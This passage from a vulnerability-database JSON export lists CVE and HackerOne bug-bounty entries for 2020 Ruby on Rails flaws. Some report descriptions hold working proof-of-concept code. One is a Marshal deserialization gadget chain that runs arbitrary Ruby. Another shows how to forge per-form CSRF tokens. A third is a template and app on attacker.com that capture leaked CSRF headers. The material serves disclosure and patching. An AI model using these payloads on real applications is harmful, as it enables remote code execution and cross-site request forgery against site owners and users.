10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2023-08-31T16:06:46", "id": "RH:CVE-2020-8164", "href": "https://access.redhat.com/security/cve/cve-2020-8164", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-17T23:40:51", "description": "A flaw was found in rubygem-actionview. A regression of CVE-2015-1840 causes Rails-ujs to send CSRF tokens to wrong domains. The highest threat from this vulnerability is to data integrity.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-02T17:53:07", "type": "redhatcve", "title": "CVE-2020-8167", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1840", "CVE-2020-8167"], "modified": "2023-08-31T16:08:05", "id": "RH:CVE-2020-8167", "href": "https://access.redhat.com/security/cve/cve-2020-8167", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-06-06T14:26:13", "description": "In Action View before versions 5.2.4.4 and 6.0.3.3 there is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks. When an HTML-unsafe string is passed as the default for a missing translation key named html or ending in _html, the default string is incorrectly marked as HTML-safe and not escaped. This is patched in versions 6.0.3.3 and 5.2.4.4. A workaround without upgrading is proposed in the source advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-11T16:15:00", "type": "cve", "title": "CVE-2020-15169", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-12-08T18:58:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2020-15169", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-15169", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T15:03:20", "description": "A client side enforcement of server side security vulnerability exists in rails < 5.2.4.2 and rails < 6.0.3.1 ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user bypassing upload limits.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-19T17:15:00", "type": "cve", "title": "CVE-2020-8162", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2022-05-24T16:15:00", "cpe": ["cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2020-8162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8162", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T15:03:22", "description": "A CSRF forgery vulnerability exists in rails < 5.2.5, rails < 6.0.4 that makes it possible for an attacker to, given a global CSRF token such as the one present in the authenticity_token meta tag, forge a per-form CSRF token.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-07-02T19:15:00", "type": "cve", "title": "CVE-2020-8166", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2020-11-20T17:47:00", "cpe": ["cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2020-8166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8166", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T15:03:20", "description": "A deserialization of untrusted data vulnernerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-19T18:15:00", "type": "cve", "title": "CVE-2020-8165", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2022-05-24T16:45:00", "cpe": ["cpe:/o:opensuse:leap:15.2", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:opensuse:leap:15.1", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2020-8165", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8165", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T15:03:21", "description": "A CSRF vulnerability exists in rails <= 6.0.3 rails-ujs module that could allow attackers to send CSRF tokens to wrong domains.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-19T18:15:00", "type": "cve", "title": "CVE-2020-8167", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8167"], "modified": "2021-10-21T14:35:00", "cpe": ["cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2020-8167", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8167", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T15:03:22", "description": "A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 which can allow an attacker to supply information can be inadvertently leaked fromStrong Parameters.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-19T17:15:00", "type": "cve", "title": "CVE-2020-8164", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2022-05-24T16:44:00", "cpe": ["cpe:/o:opensuse:leap:15.2", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:opensuse:leap:15.1", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:opensuse:backports_sle:15.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2020-8164", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8164", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*"]}], "hackerone": [{"lastseen": "2023-08-09T01:30:12", "bounty": 0.0, "description": "When a user makes a direct upload using ActiveStorage, the browser makes a request to the DirectUploadsController containing the direct_upload parameters filename, content_type, byte_size, and checksum. These are used to generate a presigned url that is then passed back to the browser, allowing the user to upload directly to S3.\n\nIn particular, the byte_size parameter is intended to be encoded in the url for content-length, preventing the user from uploading a file of a different size. Although Rails does not currently provide any built in validations, developers have been encouraged to modify the controller or provide their own controller if they want to create a validation. For example, a developer might decide to prohibit uploads greater than 10MB in size.\n\nin all current version of Rails with ActiveStorage and direct uploads `active_storage/lib/active_storage/service/s3_service.rb`, the code generates the presigned_url as follows:\n\n```ruby\n def url_for_direct_upload(key, expires_in:, content_type:, content_length:, checksum:)\n instrument :url, key: key do |payload|\n generated_url = object_for(key).presigned_url :put, expires_in: expires_in.to_i,\n content_type: content_type, content_length: content_length, content_md5: checksum\n\n payload[:url] = generated_url\n\n generated_url\n end\n end\n```\n\nHowever, the aws-sdk-s3 gem *silently blacklists* the \"content-length\" header:\n\nhttps://github.com/aws/aws-sdk-ruby/blob/master/gems/aws-sdk-s3/lib/aws-sdk-s3/presigner.rb#L22\n\nThis issue is also raised here: https://github.com/aws/aws-sdk-ruby/issues/2098\n\nAs a result, the content-length header is never actually part of the presigned url. As a result, a malicious user can select a file of arbitrary size, tell the direct uploads controller that the file is a different size, and then proceed to upload the file, bypassing the intended protection of the signed url.\n\nThe solution is to add the whitelist_headers argument:\n\n```ruby\n def url_for_direct_upload(key, expires_in:, content_type:, content_length:, checksum:)\n instrument :url, key: key do |payload|\n generated_url = object_for(key).presigned_url :put, expires_in: expires_in.to_i,\n content_type: content_type, content_length: content_length, content_md5: checksum,\n whitelist_headers: ['content-length']\n\n payload[:url] = generated_url\n\n generated_url\n end\n end\n```\nAfter this is added, the content-length will be included in the presigned url and the client will be unable to upload a file of arbitrary size.\n\n## Impact\n\nThe attacker could upload a file of any size, unless the S3 service is configured separately to prevent this, whereas the developer believes they have protected themselves against this. This could allow an attacker to upload a very large file to S3, incurring additional costs to the website owner or causing other harm.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-05T22:24:41", "type": "hackerone", "title": "Ruby on Rails: ActiveStorage direct upload fails to sign content-length header for S3 service", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2020-05-18T20:43:36", "id": "H1:789579", "href": "https://hackerone.com/reports/789579", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-09T01:21:04", "bounty": 0.0, "description": "When `per_form_csrf_tokens` is set to `true`, each form should protected against CSRF with a unique token that is not predictable by an attacker. The`per_form_csrf_token` is generated using a HMAC SHA-256 using a key that is exposed in a reversed `authenticity_token`. The `authenticity_token` is a Base64 encoding of\n\n`one_time_pad | (one_time_pad XOR session[:csrf_token])`\n\nBecause the `one_time_pad` is the first half of the `authenticity_token`, it is not secret and an attacker can reverse the token to learn `session[:csrf_token]`.\n\nFrom there the attacker can forge a hash for an arbitrary route (e.g. /articles/2):\n`HMAC ( session[:csrf_token], \"/articles/2#patch\")`\n\nTo reproduce:\n1. Have two Rails routes that accept only per form csrf tokens\n2. Validate that the `authenticity_token` sent in the POST data returns an HTTP 422 when sent in the other form\n3. Forge a per form token with the attached exploit script\n - the `authenticity_token` parameter is taken from the <meta> tag in the header of any page for the session\n - the `route` parameter is the action of the target HTML form (e.g /articles/2)\n - the `method` parameter is the value from `_method` parameter sent in the POST data (e.g. patch)\n4. Take the forged token from the exploit script, URL-encode it, and send it as the `authenticity_token` in the POST data. For reliability, ensure that:\n - the route parameter matches the endpoint,\n - the `_method` parameter in the POST data matches what used for `method` in the exploit script\n - the forged `authenticity_token` in the POST data is properly URL-encoded\n\n## Impact\n\nExploitation allow an attacker to forge valid per-form CSRF tokens even in hardened situations where the global `authenticity_token` itself is not allowed.\n\nFor the attack to be successful, an attacker would need a valid global `authenticity_token`. This can be extracted out of a web page without any protections that cookies have (such as HTTP-Only). An attacker could leverage an XSS vulnerability to bypass per-form CSRF on unrelated pages. Because the token can be forged for any form, code execution on a page without forms could still lead to attackers bypassing CSRF protections of forms related to password changes, deletion of data, creation of new users, etc.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2019-11-08T14:03:47", "type": "hackerone", "title": "Ruby on Rails: The authenticity_token can be reversed and used to forge valid per_form_csrf_tokens for arbitrary routes", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2020-08-27T16:25:50", "id": "H1:732415", "href": "https://hackerone.com/reports/732415", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-07-06T15:45:35", "bounty": 0.0, "description": "This vulnerability effects application code that caches a string from an untrusted source using the `raw: true` option. For example, vulnerable application code might looks something like the following\n\n```ruby\nbody = Rails.cache.fetch(key, raw: true, expires_in: ttl) do\n res = Net::HTTP.get_response(remote_uri)\n res.value # raise on HTTP error\n res.body\nend\n```\n\nwhere `res.body` represents the untrusted string in the example above. The below script shows that an untrusted string in the Marshal format will be deserialized when read using `raw: true`.\n\n```ruby\nrequire 'rails/all'\n\nuntrusted_string = Marshal.dump(:sym)\n\ncache = ActiveSupport::Cache::MemCacheStore.new('localhost')\ncache.delete(\"demo\")\ndata = cache.fetch(\"demo\", raw: true) { untrusted_string }\np data # \"\\x04\\b:\\bsym\"\ndata = cache.fetch(\"demo\", raw: true)\np data # :sym\n```\n\nThis vulnerability appears to have been around for a long time, so would affect all currently supported versions of rails. I've tested with the earliest and latest supported rails version, 4.2.10 and 5.2.1 and both are affected.\n\nThe vulnerability affects both MemCacheStore and RedisCacheStore cache backends that are a part of rails, but cache stores developed outside of rails could also be vulnerable. For instance, the memcached_store has the same vulnerability as a result of replicating the behaviour of MemCacheStore.\n\nI've attached patches to fix MemCacheStore and RedisCacheStore on master. I believe the MemCacheStore patch can be backported, since Dalli uses memcached's flags to tag keys that need marshal loading (since [Dalli version 0.11.0](https://github.com/petergoldstein/dalli/blob/master/History.md#0110)) so can avoid unmarshalling raw strings. However, backporting RedisCacheStore could cause backwards compatibility problems with application code that writes and reads a cache key with a different raw option value, so I've included a patch to deprecate that usage in rails 5.2.\n\n## Impact\n\nAs has been demonstrated in the past, Marshal.load of an untrusted string can lead to remote code execution when done in rails without any reliance on application code.\n\nThe following script demonstrates that this is still the case and shows that a generic exploit payload can be used.\n\n```ruby\nrequire 'erb'\nrequire 'rails/all'\n\nremote_code = <<-RUBY\nputs 'HACKED'\nRUBY\n\nerb = ERB.allocate\nerb.instance_variable_set(:@src, remote_code)\nerb.instance_variable_set(:@lineno, 0)\ndeprecation = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)\nexploit_data = Marshal.dump(deprecation)\n\nobj = Marshal.load(exploit_data)\nobj.is_a?(ActiveSupport::Cache::Entry)\n```\n\nSo a generic exploit payload could be provided to applications to try to find if the application stores and fetches raw strings from the cache.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-24T12:58:49", "type": "hackerone", "title": "Ruby on Rails: Untrusted strings that are cache fetched with raw option are automatically marshal loaded", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-05-26T22:38:29", "id": "H1:413388", "href": "https://hackerone.com/reports/413388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-09T01:30:06", "bounty": 0.0, "description": "Rails 5.1.4\n\nThe goal of `ActionController::Parameters`'s `permit` method (strong parameters) is to prevent accidental trust in the parameters sent by the client. We can therefore not simply create a hash of all the parameters in the params without permitting them first. When we really want to do this there is the method `to_unsafe_h`, indicating the importance of controlling when an unsafe hash is returned. However, when we use `.each` on our parameters object, an unsafe hash is returned that includes all the keys and their values in a new hash:\n\n```ruby\nparams = ActionController::Parameters.new(city: 'Nijmegen', country: 'Netherlands', language: 'Dutch')\n\nparams.to_h\n\n# ActionController::UnfilteredParameters: unable to convert unpermitted parameters to hash\n# from ...lib/ruby/gems/2.4.0/gems/actionpack-5.1.4/lib/action_controller/metal/strong_parameters.rb:265:in `to_h'\n\nparams.permit(:city)\n=> <ActionController::Parameters {\"city\"=>\"Nijmegen\"} permitted: true>\n\nparams.permit(:city).to_h\n=> {\"city\"=>\"Nijmegen\"}\n\nparams.to_unsafe_h\n=> {\"city\"=>\"Nijmegen\", \"country\"=>\"Netherlands\", \"language\"=>\"Dutch\"}\n\nparams.each {}\n=> {\"city\"=>\"Nijmegen\", \"country\"=>\"Netherlands\", \"language\"=>\"Dutch\"}\n```\n\nThis behaviour is extra strange when contraste with how `select` works:\n\n```ruby\nparams.select { true }\n=> <ActionController::Parameters {\"city\"=>\"Nijmegen\", \"country\"=>\"Netherlands\", \"language\"=>\"Dutch\"} permitted: false>\n```\n\nHere you can see that select returns an instance of `ActionController::Parameters` that has `permitted: false`\n\n## Impact\n\nAn attacker could find out about the accidental use of each in working with parameters in a controller and use this knowledge to send additional (more than provided in a form) parameters along and in this way circumvent authorisation checks.\n\n```ruby\n# controller:\n\ndef update\n # Attacker has included the parameter: `{ is_admin: true }`\n User.update(clean_up_params)\nend\n\ndef clean_up_params\n \n params.each { |k, v| SomeModel.check(v) if k == :name }\nend\n```\n\nThe example (admittedly simplified) above shows a possible scenario where a developer builds a method to do something with each param in a seperate method after which he might expect his parameters to adhere to normal working `permitted: true/false`. Slightly unexpected behaviour that could cause security issues.\n\nBiggest threat would seem to be to opensource projects where attackers can survey the project's code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-11-24T15:05:52", "type": "hackerone", "title": "Ruby on Rails: ActionController::Parameters .each returns an unsafe hash", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2020-05-18T20:15:57", "id": "H1:292797", "href": "https://hackerone.com/reports/292797", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-02T07:01:06", "bounty": 0.0, "description": "Looks like there is a regression in the fix for CVE-2015-1840 ([H1 report](https://hackerone.com/reports/49935)). The origin isn't being checked before adding a CSRF header to `data-remote` forms. I noticed this when checking out the new rails-ujs repo.\n\nExample Rails template:\n\n```\n<%= form_tag \"http://attacker.com\", remote: true do %>\n <button type=submit>submit</button>\n<% end %>\n```\n\nExample http://attacker.com app\n\n```\nrequire \"sinatra\"\n\noptions '/*' do\n headers['Access-Control-Allow-Origin'] = \"*\"\n headers['Access-Control-Allow-Methods'] = \"POST\"\n headers['Access-Control-Allow-Headers'] =\"x-csrf-token\"\nend\n\npost '/*' do\n \"foo\"\nend\n```\n\nWhen the form is submitted, an XHR request to attacker.com is sent, including the `X-CSRF-Token` header.\n\nPS: @tenderlove told me to submit this here. I shouldn't get paid since I'm one of the GitHub folks who reviews these H1 submissions now.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-12-09T16:27:17", "type": "hackerone", "title": "Ruby on Rails: CSRF header is sent to external websites when using data-remote forms", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 